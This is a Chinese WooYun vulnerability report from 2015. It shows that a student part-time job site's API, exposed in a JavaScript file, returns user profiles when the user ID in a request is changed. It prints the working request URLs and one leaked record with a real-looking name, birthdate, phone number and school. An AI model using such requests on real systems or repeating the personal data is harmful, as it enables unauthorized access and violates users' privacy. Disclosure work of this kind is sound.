当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116193

漏洞标题:某学生兼职网站接口泄露用户敏感信息

相关厂商:北京蓝众时代网络科技有限公司

漏洞作者: lonely-duck

提交时间:2015-06-02 18:00

修复时间:2015-07-17 18:00

公开时间:2015-07-17 18:00

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:18

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-02: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-07-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

请求用户信息的接口暴露在JS文件中

详细说明:

//查看简历
function getMyResumeURL(userId) {
var pamaArr = [];
pamaArr.push("'AppUserID'" + ":" + "'" + userId + "'");
var str = pamaArr.join(',');
return serviceURL + "{" + getBaseParameterStr('1020') + "," + str + "}" + getRandom();
}
var domain = "http://e.tanlu.cc/";
var appHandler = domain + "AppService/AppRouteHandler.ashx";
var serviceURL = appHandler + "?msg=";
var locationURL = "http://wei.tanlu.cc/IP/Default.aspx";
var imageServerURL = "http://e.tanlu.cc/";
var pageNum = 10;
var version = "1.01";

漏洞证明:

http://e.tanlu.cc/AppService/AppRouteHandler.ashx?msg={'transCode':'1020','version':'1.0','trxDate':'20140806230233','signature':'signature','AppUserID':'9999'}&tanluRandom=0.4253617955837399


结果太吓人,不敢看(一定要等该网站修复此漏洞后,才能公开!!!!)

1.jpg


http://e.tanlu.cc/AppService/AppRouteHandler.ashx?msg={%27transCode%27:%271020%27,%27version%27:%271.0%27,%27trxDate%27:%2720140806230233%27,%27signature%27:%27signature%27,%27AppUserID%27:%279998%27}&tanluRandom=0.4253617955837399


{"Name":"孙培波","IDCardNo":"","OpTime":null,"BirthDay":"1994-04-10","Sex":"男","Description":"","Tall":"175","Phone":"18134411120","ApplyCount":"0","WorkCount":"0","VerifySchoolCard":"待认证","VerifyIDCard":"待认证","HeadImg":"images/morenhead.jpg","DataList":[{"FGradeID":4,"FMajorID":0,"FDepartmentID":0,"FSchooleID":26,"FClassName":"","FStartTime":2013,"FEndTime":2004,"FGradeName":"大专","FMajorName":null,"FDeptName":null,"FSchooleName":"河南职业技术学院"}],"TransCode":"1020","Version":"1.0","RetCode":"0000","ErrorMsg":""}

修复方案:

版权声明:转载请注明来源 lonely-duck@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论